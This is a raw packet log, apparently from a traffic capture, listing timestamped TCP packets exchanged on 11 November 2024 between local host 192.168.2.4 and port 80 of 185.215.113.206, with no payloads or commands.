                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715914965 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715915918 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715928078 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715933084 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715941906 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715950012 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715955019 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715976000 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.716003895 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.717825890 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.717838049 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.717847109 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.717868090 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.717879057 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.717885971 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.717885971 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.717890978 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.717905998 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.717905998 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.717921019 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.717927933 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.717933893 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.717947006 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.717956066 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.717961073 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.717973948 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.717986107 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.717984915 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.717995882 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718000889 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718014956 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718025923 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718035936 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718040943 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718054056 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718065023 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718066931 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718080997 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718086004 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718094110 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718102932 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718127966 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718255043 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718267918 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718277931 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718291044 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718292952 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718302965 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718312979 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718316078 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718328953 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718338013 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718343019 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718355894 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718358994 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718369007 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718377113 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718383074 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718394995 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718410015 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718414068 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718417883 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718427896 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718441010 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718444109 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718451977 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718455076 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718468904 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718472958 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718482971 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718492031 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718497992 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718509912 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718518972 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718522072 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718535900 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718548059 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718552113 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718560934 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718563080 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718573093 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718585968 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718589067 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718600035 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718614101 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718615055 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718624115 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718627930 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718642950 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718648911 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.718677998 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721050024 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721061945 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721072912 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721093893 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721096992 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721107006 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721117973 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721121073 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721134901 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721141100 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721148968 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721159935 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721163988 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721179962 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721183062 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721193075 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721204996 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721209049 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721216917 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721226931 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721230984 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721244097 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721251011 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721263885 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721267939 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721277952 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721291065 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721297979 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721304893 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721307993 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721316099 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721318960 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721333027 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721354961 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721529961 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721544027 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721555948 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721568108 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721581936 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721594095 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721596956 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721607924 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721611977 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721621037 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721626997 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721636057 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721651077 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721657038 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721667051 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721679926 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721692085 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721704006 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721724033 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721731901 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721731901 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721745014 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721756935 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721767902 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721784115 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721796036 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721810102 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721829891 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721837044 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721837044 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721837044 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721837044 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721843004 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721856117 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721863985 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721870899 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721878052 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721885920 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721904039 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721906900 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721920967 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721931934 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721936941 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721949100 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721956015 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721965075 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721982002 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.721995115 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723439932 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723459959 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723472118 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723484039 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723489046 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723495960 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723500967 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723509073 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723515987 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723522902 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723539114 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723540068 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723551989 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723556995 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723563910 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723576069 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723582983 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723588943 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723606110 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723608971 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723618031 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723622084 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723637104 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723642111 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723649025 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723663092 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723670959 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723676920 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723681927 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723690987 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723702908 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723710060 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.723732948 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724205017 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724217892 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724229097 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724239111 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724251032 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724258900 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724272013 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724272013 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724286079 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724287987 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724298954 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724311113 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724313974 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724324942 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724324942 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724338055 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724339962 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724350929 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724356890 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724364042 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724375963 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724375963 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724390030 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724400043 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724401951 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724416971 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724425077 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724431992 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724436998 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724446058 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724457979 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724467039 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724471092 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724486113 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724489927 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724505901 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.724534035 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.873370886 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.878168106 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.073086023 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.073263884 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.073275089 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.073287010 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.073298931 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.073309898 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.073322058 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.073327065 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.073362112 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.073367119 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.073371887 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.073380947 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.073401928 CET4975380192.168.2.4185.215.113.206
